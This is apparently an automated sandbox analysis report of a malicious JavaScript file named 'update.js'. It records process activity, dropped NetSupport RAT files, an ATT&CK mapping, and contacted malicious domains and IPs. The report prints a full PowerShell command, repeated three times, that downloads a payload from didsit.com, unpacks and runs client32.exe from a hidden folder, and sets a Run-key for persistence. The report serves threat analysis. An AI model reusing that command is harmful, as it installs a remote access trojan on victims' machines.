                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8461
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1387
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWindow / User API: threadDelayed 8118
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\RYMB15\HTCTL32.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\RYMB15\remcmdstub.exeJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\RYMB15\TCCTL32.DLLJump to dropped file
                      Source: C:\Windows\System32\wscript.exe TID: 2752Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 5948Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5400Thread sleep count: 8461 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4880Thread sleep count: 1387 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5492Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe TID: 5824Thread sleep count: 112 > 30
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe TID: 6160Thread sleep count: 257 > 30
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe TID: 6160Thread sleep time: -64250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe TID: 6160Thread sleep count: 8118 > 30
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe TID: 6160Thread sleep time: -2029500s >= -30000s
                      Source: C:\Windows\System32\wscript.exe TID: 1488Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exeThread delayed: delay time: 30000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\wscript.exeNetwork Connect: 149.255.36.73 443
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\RYMB15\client32.exe "C:\Users\user\AppData\Roaming\RYMB15\client32.exe"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $awbh='http://didsit.com/data.php?7211';$rgozcxqbn=(new-object system.net.webclient).downloadstring($awbh);$rwpjkwod=[system.convert]::frombase64string($rgozcxqbn);$asd = get-random -minimum -10 -maximum 17; $rngb=[system.environment]::getfolderpath('applicationdata')+'\rymb'+$asd;if (!(test-path $rngb -pathtype container)) { new-item -path $rngb -itemtype directory };$p=join-path $rngb 'ccleaner.zip';[system.io.file]::writeallbytes($p,$rwpjkwod);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$rngb)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $rngb 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $rngb -force; $fd.attributes='hidden';$s=$rngb+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='bcylgmfsmv';$ds='string';new-itemproperty -path $k -name $v -value $s -propertytype $ds;
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $awbh='http://didsit.com/data.php?7211';$rgozcxqbn=(new-object system.net.webclient).downloadstring($awbh);$rwpjkwod=[system.convert]::frombase64string($rgozcxqbn);$asd = get-random -minimum -10 -maximum 17; $rngb=[system.environment]::getfolderpath('applicationdata')+'\rymb'+$asd;if (!(test-path $rngb -pathtype container)) { new-item -path $rngb -itemtype directory };$p=join-path $rngb 'ccleaner.zip';[system.io.file]::writeallbytes($p,$rwpjkwod);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$rngb)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $rngb 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $rngb -force; $fd.attributes='hidden';$s=$rngb+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='bcylgmfsmv';$ds='string';new-itemproperty -path $k -name $v -value $s -propertytype $ds;
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: Yara matchFile source: 0000000D.00000000.1483378561.0000000000082000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\RYMB15\pcicapi.dll, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\RYMB15\PCICHEK.DLL, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\RYMB15\TCCTL32.DLL, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\RYMB15\HTCTL32.DLL, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\RYMB15\PCICL32.DLL, type: DROPPED
                      Source: Yara matchFile source: 0000000B.00000002.1544728438.00000177485B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1544728438.000001774858B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1544728438.00000177486DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1544728438.00000177485AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1544728438.000001774822A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2502075711.000000006C9F0000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2454265595.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2487457732.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2422220902.0000000000082000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2485075495.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information12
                      Scripting                      		Valid Accounts1
                      Windows Management Instrumentation                      		12
                      Scripting                      		111
                      Process Injection                      		11
                      Masquerading                      		OS Credential Dumping12
                      Security Software Discovery                      		Remote ServicesData from Local System2
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Command and Scripting Interpreter                      		1
                      Registry Run Keys / Startup Folder                      		1
                      Registry Run Keys / Startup Folder                      		41
                      Virtualization/Sandbox Evasion                      		LSASS Memory1
                      Process Discovery                      		Remote Desktop ProtocolData from Removable Media1
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Exploitation for Client Execution                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		111
                      Process Injection                      		Security Account Manager41
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive3
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts3
                      PowerShell                      		Login HookLogin Hook1
                      Obfuscated Files or Information                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture4
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets2
                      File and Directory Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials32
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      No Antivirus matches

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\RYMB15\HTCTL32.DLL13%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Roaming\RYMB15\PCICHEK.DLL5%ReversingLabs
                      C:\Users\user\AppData\Roaming\RYMB15\PCICL32.DLL17%ReversingLabs
                      C:\Users\user\AppData\Roaming\RYMB15\TCCTL32.DLL6%ReversingLabs
                      C:\Users\user\AppData\Roaming\RYMB15\client32.exe26%ReversingLabsWin32.Trojan.NetSupport
                      C:\Users\user\AppData\Roaming\RYMB15\msvcr100.dll0%ReversingLabs
                      C:\Users\user\AppData\Roaming\RYMB15\pcicapi.dll3%ReversingLabs
                      C:\Users\user\AppData\Roaming\RYMB15\remcmdstub.exe24%ReversingLabsWin32.Trojan.Generic

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://didsit.com/data.php?7211100%Avira URL Cloudmalware
                      http://5.181.159.28/fakeurl.htm0%Avira URL Cloudsafe
                      http://geo.netsupportsoftware.com/location/loca.asp0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      geo.netsupportsoftware.com
                      		104.26.1.231
                      		truefalse
                        		unknown
                        didsit.com
                        		37.1.210.252
                        		truetrue
                          		unknown
                          alphawatchrmf.com
                          		149.255.36.73
                          		truetrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://didsit.com/data.php?7211true
                            • Avira URL Cloud: malware
                            		unknown
                            http://5.181.159.28/fakeurl.htmfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://geo.netsupportsoftware.com/location/loca.aspfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            149.255.36.73
                            		alphawatchrmf.comNetherlands
                            		29802HVC-ASUStrue
                            104.26.1.231
                            		geo.netsupportsoftware.comUnited States
                            		13335CLOUDFLARENETUSfalse
                            184.28.90.27
                            		unknownUnited States
                            		16625AKAMAI-ASUSfalse
                            37.1.210.252
                            		didsit.comUkraine
                            		29802HVC-ASUStrue
                            5.181.159.28
                            		unknownMoldova Republic of
                            		39798MIVOCLOUDMDfalse

                            Private

                            IP
                            127.0.0.1

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1490239
                            Start date and time:2024-08-08 22:33:43 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:17
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • EGA enabled
                            Analysis Mode:stream
                            Analysis stop reason:Timeout
                            Sample name:update.js
                            Detection:MAL
                            Classification:mal100.troj.expl.evad.winJS@8/26@3/66
                            Cookbook Comments:
                            • Found application associated with file extension: .js

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 52.165.164.15
                            • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, fs.microsoft.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: update.js

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\loca[1].htm

                            Download File
                            Process:C:\Users\user\AppData\Roaming\RYMB15\client32.exe
                            File Type:ASCII text, with no line terminators
                            Category:modified
                            Size (bytes):16
                            Entropy (8bit):3.077819531114783
                            Encrypted:false
                            SSDEEP:
                            MD5:C40449C13038365A3E45AB4D7F3C2F3E
                            SHA1:CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
                            SHA-256:1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
                            SHA-512:3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
                            Malicious:false
                            Reputation:unknown
                            Preview:40.7357,-74.1724

